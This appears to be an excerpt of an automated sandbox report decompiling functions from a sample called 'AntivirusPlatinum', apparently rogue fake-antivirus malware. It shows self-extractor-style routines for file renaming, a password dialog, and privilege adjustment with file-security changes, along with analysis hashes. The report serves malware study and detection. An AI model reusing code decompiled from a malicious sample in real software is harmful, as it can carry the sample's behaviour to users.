                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClassCursorLoadRegister
                                                                                                                                                      • String ID: 0$RarHtmlClassName
                                                                                                                                                      • API String ID: 1693014935-3342523147
                                                                                                                                                      • Opcode ID: b12bf7c0c9965d7db7596dfc66fcbb35501a819052bd8b0df238785525de2599
                                                                                                                                                      • Instruction ID: b63988667752bf0d1750ea4bc76319caf74b36bbe64378bd257d001b5d573ad9
                                                                                                                                                      • Opcode Fuzzy Hash: b12bf7c0c9965d7db7596dfc66fcbb35501a819052bd8b0df238785525de2599
                                                                                                                                                      • Instruction Fuzzy Hash: BAF0B6B1D01218ABDB019F99D9889DEFBF8FF59704F10805BE510B7250C7B856158FA9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040B2A9(CHAR* _a8, char _a12) {
                                                                                                                                                      				char _v4100;
                                                                                                                                                      				char* _t7;
                                                                                                                                                      				void* _t13;
                                                                                                                                                      				long _t17;
                                                                                                                                                      
                                                                                                                                                      				_t7 = E00401200(0x1000);
                                                                                                                                                      				if( *0x419f78 == 0) {
                                                                                                                                                      					_t7 = _a8;
                                                                                                                                                      					if( *_t7 != 0) {
                                                                                                                                                      						_t17 = GetLastError();
                                                                                                                                                      						_t2 =  &_a12; // 0x40555d
                                                                                                                                                      						wvsprintfA( &_v4100, _a8, _t2);
                                                                                                                                                      						_t13 = E0040AE5A(0x4122d8,  &_v4100);
                                                                                                                                                      						if(_t17 != 0) {
                                                                                                                                                      							SetLastError(_t17);
                                                                                                                                                      						}
                                                                                                                                                      						return _t13;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t7;
                                                                                                                                                      			}







                                                                                                                                                      0x0040b2b1
                                                                                                                                                      0x0040b2bd
                                                                                                                                                      0x0040b2bf
                                                                                                                                                      0x0040b2c5
                                                                                                                                                      0x0040b2ce
                                                                                                                                                      0x0040b2d0
                                                                                                                                                      0x0040b2de
                                                                                                                                                      0x0040b2f0
                                                                                                                                                      0x0040b2f9
                                                                                                                                                      0x0040b2fc
                                                                                                                                                      0x0040b2fc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b302
                                                                                                                                                      0x0040b2c5
                                                                                                                                                      0x0040b304

                                                                                                                                                      APIs
                                                                                                                                                      • GetLastError.KERNEL32(00414C7C,?,004032F4,00000000,00000000,00000076,?,00000000,00404FA1,00000017,00000000,00000000,004054A9,?), ref: 0040B2C8
                                                                                                                                                      • wvsprintfA.USER32(?,?,]U@), ref: 0040B2DE
                                                                                                                                                        • Part of subcall function 0040AE5A: wvsprintfA.USER32(?,?,?), ref: 0040AE7B
                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,004032F4,00000000,00000000,00000076,?,00000000,00404FA1,00000017,00000000,00000000,004054A9,?), ref: 0040B2FC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLastwvsprintf
                                                                                                                                                      • String ID: ]U@
                                                                                                                                                      • API String ID: 2157943386-708152432
                                                                                                                                                      • Opcode ID: 05e9acf8f71246b7a0c130bf83baa347096ba25980d1154a7551ccc3d37d6479
                                                                                                                                                      • Instruction ID: d4fdff9da87b2b6eb3902b3be9dba9c97109d9518f32d3958c30564e7a0a465c
                                                                                                                                                      • Opcode Fuzzy Hash: 05e9acf8f71246b7a0c130bf83baa347096ba25980d1154a7551ccc3d37d6479
                                                                                                                                                      • Instruction Fuzzy Hash: 1CF0E23240461CABDB129B24DC08BDE33ACEF09395F1041B6F805E2290C7B89E808B9D
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                      			E0040ACA1(signed int _a4) {
                                                                                                                                                      				signed int _t4;
                                                                                                                                                      				signed int _t10;
                                                                                                                                                      				struct HDC__* _t13;
                                                                                                                                                      
                                                                                                                                                      				if( *0x41f318 == 0) {
                                                                                                                                                      					_t13 = GetDC(0);
                                                                                                                                                      					if(_t13 != 0) {
                                                                                                                                                      						 *0x41f318 = GetDeviceCaps(_t13, 0x58);
                                                                                                                                                      						ReleaseDC(0, _t13);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t4 =  *0x41f318; // 0x60
                                                                                                                                                      				asm("cdq");
                                                                                                                                                      				_t10 = 0x60;
                                                                                                                                                      				return _t4 * _a4 / _t10;
                                                                                                                                                      			}






                                                                                                                                                      0x0040aca8
                                                                                                                                                      0x0040acb3
                                                                                                                                                      0x0040acb7
                                                                                                                                                      0x0040acc5
                                                                                                                                                      0x0040acca
                                                                                                                                                      0x0040acca
                                                                                                                                                      0x0040acd0
                                                                                                                                                      0x0040acd1
                                                                                                                                                      0x0040acdd
                                                                                                                                                      0x0040acde
                                                                                                                                                      0x0040ace1

                                                                                                                                                      APIs
                                                                                                                                                      • GetDC.USER32(00000000), ref: 0040ACAD
                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0040ACBC
                                                                                                                                                      • ReleaseDC.USER32 ref: 0040ACCA
                                                                                                                                                      Strings
                                                                                                                                                      • C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe, xrefs: 0040ACAA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CapsDeviceRelease
                                                                                                                                                      • String ID: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                      • API String ID: 127614599-2058154495
                                                                                                                                                      • Opcode ID: 23e503250e671d4b5bf7f771171e596611eb0c5dc39ab2f57af2eff24b2b2b41
                                                                                                                                                      • Instruction ID: 4be5ef56d5da3d017a27d9bd15ee070ca2e7f4ed1232f0d4ef002000c82c220f
                                                                                                                                                      • Opcode Fuzzy Hash: 23e503250e671d4b5bf7f771171e596611eb0c5dc39ab2f57af2eff24b2b2b41
                                                                                                                                                      • Instruction Fuzzy Hash: 40E01A32545714ABE310DB14AE49B877A64AB15B12F018136FB05AA1E0C7B48464ABDD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 97%
                                                                                                                                                      			E00404B4F(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                      				char _v1028;
                                                                                                                                                      				char _v2052;
                                                                                                                                                      				char _v5156;
                                                                                                                                                      				char _v6212;
                                                                                                                                                      				char _v9412;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* _t38;
                                                                                                                                                      				void* _t51;
                                                                                                                                                      				int _t57;
                                                                                                                                                      				void* _t68;
                                                                                                                                                      				void* _t69;
                                                                                                                                                      				void* _t80;
                                                                                                                                                      
                                                                                                                                                      				E00401200(0x24c0);
                                                                                                                                                      				_t70 =  &_v9412;
                                                                                                                                                      				E00403556( &_v9412);
                                                                                                                                                      				_t77 = _a4;
                                                                                                                                                      				_t68 = 0;
                                                                                                                                                      				_push(0);
                                                                                                                                                      				if(E00406045( &_v9412, __edx, _a4, _a8,  &_v9412) == 0 || _v9412 == 0 || _v6212 == 0 || E0040DA54(E004073DB( &_v9412),  &_v6212) == 0) {
                                                                                                                                                      					L15:
                                                                                                                                                      					__eflags = 0;
                                                                                                                                                      					return 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t38 = E0040DA54(E004073DB(_t77),  &_v6212);
                                                                                                                                                      					_t86 = _t38;
                                                                                                                                                      					if(_t38 != 0) {
                                                                                                                                                      						goto L15;
                                                                                                                                                      					}
                                                                                                                                                      					while(1) {
                                                                                                                                                      						E0040DB30( &_v1028, _t77, 0x400);
                                                                                                                                                      						E0040A610(_t70, E004073DB( &_v1028), "rtmp%d", _t68);
                                                                                                                                                      						_t80 = _t80 + 0xc;
                                                                                                                                                      						if(E00405767(_t86,  &_v1028, 0) == 0) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						_t68 = _t68 + 0x7b;
                                                                                                                                                      						_t88 = _t68 - 0x2710;
                                                                                                                                                      						if(_t68 < 0x2710) {
                                                                                                                                                      							continue;
                                                                                                                                                      						}
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					if(E00405767(_t88,  &_v1028, 0) != 0) {
                                                                                                                                                      						goto L15;
                                                                                                                                                      					}
                                                                                                                                                      					E0040DB30( &_v2052, _t77, 0x400);
                                                                                                                                                      					_t51 = E004073DB( &_v9412);
                                                                                                                                                      					E0040A477(E004073DB( &_v2052), _t51);
                                                                                                                                                      					_t57 = MoveFileA( &_v2052,  &_v1028);
                                                                                                                                                      					_t90 = _t57;
                                                                                                                                                      					if(_t57 == 0) {
                                                                                                                                                      						goto L15;
                                                                                                                                                      					}
                                                                                                                                                      					E00404EC3( &_v5156);
                                                                                                                                                      					_t69 = 0;
                                                                                                                                                      					if(E00405767(_t90, _t77, 0) == 0) {
                                                                                                                                                      						_t69 = E004051D8( &_v5156, _t77, 0, 1);
                                                                                                                                                      					}
                                                                                                                                                      					MoveFileA( &_v1028,  &_v2052);
                                                                                                                                                      					if(_t69 != 0) {
                                                                                                                                                      						E00404F2E( &_v5156);
                                                                                                                                                      						E00404FAC( &_v5156);
                                                                                                                                                      					}
                                                                                                                                                      					E00405074(_t69,  &_v5156);
                                                                                                                                                      					return 1;
                                                                                                                                                      				}
                                                                                                                                                      			}















                                                                                                                                                      0x00404b57
                                                                                                                                                      0x00404b5f
                                                                                                                                                      0x00404b65
                                                                                                                                                      0x00404b6a
                                                                                                                                                      0x00404b6d
                                                                                                                                                      0x00404b6f
                                                                                                                                                      0x00404b82
                                                                                                                                                      0x00404ce8
                                                                                                                                                      0x00404ce8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404bc1
                                                                                                                                                      0x00404bcf
                                                                                                                                                      0x00404bd4
                                                                                                                                                      0x00404bd6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404be1
                                                                                                                                                      0x00404bea
                                                                                                                                                      0x00404c02
                                                                                                                                                      0x00404c07
                                                                                                                                                      0x00404c1a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404c1c
                                                                                                                                                      0x00404c1f
                                                                                                                                                      0x00404c25
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404c25
                                                                                                                                                      0x00404c37
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404c46
                                                                                                                                                      0x00404c52
                                                                                                                                                      0x00404c65
                                                                                                                                                      0x00404c7e
                                                                                                                                                      0x00404c80
                                                                                                                                                      0x00404c82
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404c8a
                                                                                                                                                      0x00404c92
                                                                                                                                                      0x00404c9b
                                                                                                                                                      0x00404cad
                                                                                                                                                      0x00404cad
                                                                                                                                                      0x00404cbd
                                                                                                                                                      0x00404cc1
                                                                                                                                                      0x00404cc9
                                                                                                                                                      0x00404cd4
                                                                                                                                                      0x00404cd4
                                                                                                                                                      0x00404cdf
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404ce4

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040DA54: CompareStringA.KERNEL32(00000400,00001001,0040BAA2,000000FF,?,000000FF,0040BAA2,?,STATIC), ref: 0040DA6A
                                                                                                                                                        • Part of subcall function 0040A610: wvsprintfA.USER32(00000000,74905AD0,00414C88), ref: 0040A623
                                                                                                                                                        • Part of subcall function 00405767: GetFileAttributesW.KERNEL32(?,00404D18,00000045,?,?,?,?), ref: 0040577F
                                                                                                                                                      • MoveFileA.KERNEL32 ref: 00404C7E
                                                                                                                                                      • MoveFileA.KERNEL32 ref: 00404CBD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Move$AttributesCompareStringwvsprintf
                                                                                                                                                      • String ID: rtmp%d
                                                                                                                                                      • API String ID: 1782884900-3303766350
                                                                                                                                                      • Opcode ID: d76d8e228970df82160ae1bd043e0aa0810584178d57b14355410fbc6a8d3338
                                                                                                                                                      • Instruction ID: 2635e19358c8d7c776646382d2ab8edccefdc26a919b6fac259dc95f7fea154b
                                                                                                                                                      • Opcode Fuzzy Hash: d76d8e228970df82160ae1bd043e0aa0810584178d57b14355410fbc6a8d3338
                                                                                                                                                      • Instruction Fuzzy Hash: 744122B680521865DF20F6A29C45FEB737CAF45348F0504BBBA04B7191DA78AB498F78
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 60%
                                                                                                                                                      			E00403785(void* __edx, void* __eflags, intOrPtr _a4, CHAR* _a8, WCHAR* _a12) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				char _v12;
                                                                                                                                                      				char _v16;
                                                                                                                                                      				void* _t13;
                                                                                                                                                      				int _t15;
                                                                                                                                                      				void* _t17;
                                                                                                                                                      				intOrPtr _t38;
                                                                                                                                                      
                                                                                                                                                      				_t13 = E00406EA5();
                                                                                                                                                      				if(_t13 == 0) {
                                                                                                                                                      					return _t13;
                                                                                                                                                      				}
                                                                                                                                                      				_t29 = _a4;
                                                                                                                                                      				_v16 = 0;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_t15 = E00402511(_a4, __edx,  &_v16, 0);
                                                                                                                                                      				if(_t15 != 0) {
                                                                                                                                                      					E004034AA();
                                                                                                                                                      					_t17 = 7;
                                                                                                                                                      					_t38 =  *0x41486d; // 0x0
                                                                                                                                                      					if(_t38 != 0) {
                                                                                                                                                      						_t17 = 0xf;
                                                                                                                                                      					}
                                                                                                                                                      					_push(_v16);
                                                                                                                                                      					_push(_t17);
                                                                                                                                                      					if(_a12 == 0) {
                                                                                                                                                      						_t15 = SetFileSecurityA(_a8, ??, ??);
                                                                                                                                                      					} else {
                                                                                                                                                      						_t15 = SetFileSecurityW(_a12, ??, ??);
                                                                                                                                                      					}
                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                      						E00402C95(E0040B2A9(_t29 + 0x17, E004098F7(0x3e4), _a8));
                                                                                                                                                      						_t15 = E0040325C(0x414c7c, 1);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				if(_v16 != 0) {
                                                                                                                                                      					_t15 = E0040A205(_v16);
                                                                                                                                                      				}
                                                                                                                                                      				return _t15;
                                                                                                                                                      			}










                                                                                                                                                      0x0040378b
                                                                                                                                                      0x00403792
                                                                                                                                                      0x0040382b
                                                                                                                                                      0x0040382b
                                                                                                                                                      0x0040379a
                                                                                                                                                      0x004037a6
                                                                                                                                                      0x004037a9
                                                                                                                                                      0x004037ac
                                                                                                                                                      0x004037af
                                                                                                                                                      0x004037b6
                                                                                                                                                      0x004037b8
                                                                                                                                                      0x004037bf
                                                                                                                                                      0x004037c0
                                                                                                                                                      0x004037c6
                                                                                                                                                      0x004037ca
                                                                                                                                                      0x004037ca
                                                                                                                                                      0x004037cb
                                                                                                                                                      0x004037ce
                                                                                                                                                      0x004037d2
                                                                                                                                                      0x004037e2
                                                                                                                                                      0x004037d4
                                                                                                                                                      0x004037d7
                                                                                                                                                      0x004037d7
                                                                                                                                                      0x004037ea
                                                                                                                                                      0x0040380d
                                                                                                                                                      0x00403816
                                                                                                                                                      0x00403816
                                                                                                                                                      0x004037ea
                                                                                                                                                      0x0040381e
                                                                                                                                                      0x00403823
                                                                                                                                                      0x00403823
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406EA5: GetVersionExA.KERNEL32(?), ref: 00406EC9
                                                                                                                                                        • Part of subcall function 004034AA: GetCurrentProcess.KERNEL32(00000020,?,00000000,004037BD,?,00000000,?,?), ref: 004034CC
                                                                                                                                                        • Part of subcall function 004034AA: OpenProcessToken.ADVAPI32(00000000), ref: 004034D3
                                                                                                                                                        • Part of subcall function 004034AA: LookupPrivilegeValueA.ADVAPI32 ref: 004034FD
                                                                                                                                                        • Part of subcall function 004034AA: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00403514
                                                                                                                                                        • Part of subcall function 004034AA: GetLastError.KERNEL32 ref: 0040351A
                                                                                                                                                        • Part of subcall function 004034AA: LookupPrivilegeValueA.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 00403535
                                                                                                                                                        • Part of subcall function 004034AA: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00403546
                                                                                                                                                        • Part of subcall function 004034AA: CloseHandle.KERNEL32(?), ref: 0040354B
                                                                                                                                                      • SetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?), ref: 004037D7
                                                                                                                                                      • SetFileSecurityA.ADVAPI32(?,00000007,?), ref: 004037E2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Token$AdjustFileLookupPrivilegePrivilegesProcessSecurityValue$CloseCurrentErrorHandleLastOpenVersion
                                                                                                                                                      • String ID: |LA
                                                                                                                                                      • API String ID: 4147173873-4290591017
                                                                                                                                                      • Opcode ID: 031a4094fff4cba979b8f8a1f0c503f74b4c030b813af40330e59ae485e2f175
                                                                                                                                                      • Instruction ID: 0910def5baac2a01ac3a580e2fa06c7b6af0b123cc6588ceabb19b3ba280500f
                                                                                                                                                      • Opcode Fuzzy Hash: 031a4094fff4cba979b8f8a1f0c503f74b4c030b813af40330e59ae485e2f175
                                                                                                                                                      • Instruction Fuzzy Hash: 0F118F72900214BBDF017F959C4599D7BACAB48315F00C4BBF905B62C1D77D8F508699
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 44%
                                                                                                                                                      			E00402C96(intOrPtr _a4, long _a8, int* _a12, intOrPtr _a16) {
                                                                                                                                                      				struct HWND__* _t9;
                                                                                                                                                      				int _t14;
                                                                                                                                                      				int _t15;
                                                                                                                                                      				struct HWND__* _t17;
                                                                                                                                                      				int* _t18;
                                                                                                                                                      
                                                                                                                                                      				if( *0x41a792 == 0) {
                                                                                                                                                      					__eflags = _a4 - 2;
                                                                                                                                                      					_t9 =  *0x419f80; // 0x0
                                                                                                                                                      					_t17 = _t9;
                                                                                                                                                      					if(_a4 == 2) {
                                                                                                                                                      						_t15 = IsWindowVisible(_t9);
                                                                                                                                                      						__eflags = _t15;
                                                                                                                                                      						if(_t15 == 0) {
                                                                                                                                                      							_t17 = 0;
                                                                                                                                                      							__eflags = 0;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					__eflags =  *0x419ee8; // 0x0
                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                      						L9:
                                                                                                                                                      						_t18 = _a12;
                                                                                                                                                      						E0040A477(_t18, 0x419ee8);
                                                                                                                                                      					} else {
                                                                                                                                                      						_t14 = DialogBoxParamA( *0x414c74, "GETPASSWORD1", _t17, E0040B213, _a8);
                                                                                                                                                      						__eflags = _t14;
                                                                                                                                                      						if(_t14 != 0) {
                                                                                                                                                      							goto L9;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t18 = _a12;
                                                                                                                                                      							 *_t18 = 0;
                                                                                                                                                      							 *0x419f78 = 1;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					__eflags =  *_t18;
                                                                                                                                                      					if( *_t18 != 0) {
                                                                                                                                                      						_push(0x80);
                                                                                                                                                      						_push(_t18);
                                                                                                                                                      						_push(0x41a792);
                                                                                                                                                      						goto L12;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					_push(_a16);
                                                                                                                                                      					_t18 = _a12;
                                                                                                                                                      					_push(0x41a792);
                                                                                                                                                      					_push(_t18);
                                                                                                                                                      					L12:
                                                                                                                                                      					E0040A4AB();
                                                                                                                                                      				}
                                                                                                                                                      				return 0 |  *_t18 != 0x00000000;
                                                                                                                                                      			}








                                                                                                                                                      0x0040bc67
                                                                                                                                                      0x0040bc77
                                                                                                                                                      0x0040bc7b
                                                                                                                                                      0x0040bc80
                                                                                                                                                      0x0040bc82
                                                                                                                                                      0x0040bc85
                                                                                                                                                      0x0040bc8b
                                                                                                                                                      0x0040bc8d
                                                                                                                                                      0x0040bc8f
                                                                                                                                                      0x0040bc8f
                                                                                                                                                      0x0040bc8f
                                                                                                                                                      0x0040bc8d
                                                                                                                                                      0x0040bc91
                                                                                                                                                      0x0040bc97
                                                                                                                                                      0x0040bcc8
                                                                                                                                                      0x0040bcc8
                                                                                                                                                      0x0040bcd1
                                                                                                                                                      0x0040bc99
                                                                                                                                                      0x0040bcad
                                                                                                                                                      0x0040bcb3
                                                                                                                                                      0x0040bcb5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bcb7
                                                                                                                                                      0x0040bcb7
                                                                                                                                                      0x0040bcba
                                                                                                                                                      0x0040bcbc
                                                                                                                                                      0x0040bcbc
                                                                                                                                                      0x0040bcb5
                                                                                                                                                      0x0040bcd6
                                                                                                                                                      0x0040bcd8
                                                                                                                                                      0x0040bcda
                                                                                                                                                      0x0040bcdf
                                                                                                                                                      0x0040bce0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bce0
                                                                                                                                                      0x0040bc69
                                                                                                                                                      0x0040bc69
                                                                                                                                                      0x0040bc6c
                                                                                                                                                      0x0040bc6f
                                                                                                                                                      0x0040bc74
                                                                                                                                                      0x0040bce5
                                                                                                                                                      0x0040bce5
                                                                                                                                                      0x0040bce5
                                                                                                                                                      0x0040bcf4

                                                                                                                                                      APIs
                                                                                                                                                      • IsWindowVisible.USER32(00000000), ref: 0040BC85
                                                                                                                                                      • DialogBoxParamA.USER32 ref: 0040BCAD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DialogParamVisibleWindow
                                                                                                                                                      • String ID: GETPASSWORD1
                                                                                                                                                      • API String ID: 3157717868-3292211884
                                                                                                                                                      • Opcode ID: 0856605c94a204dc3c5ee9fad0e89998df4169891d6accadbc66455f57c12071
                                                                                                                                                      • Instruction ID: e13c2818cff99f58c8b25236b3b71f5baad7010d8761cbc8bff7993bfc24fc4f
                                                                                                                                                      • Opcode Fuzzy Hash: 0856605c94a204dc3c5ee9fad0e89998df4169891d6accadbc66455f57c12071
                                                                                                                                                      • Instruction Fuzzy Hash: 1D018232189355BBEB21DF609D4AAD77A54EA21314B14843FF880732C0D7B89CA097DE
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
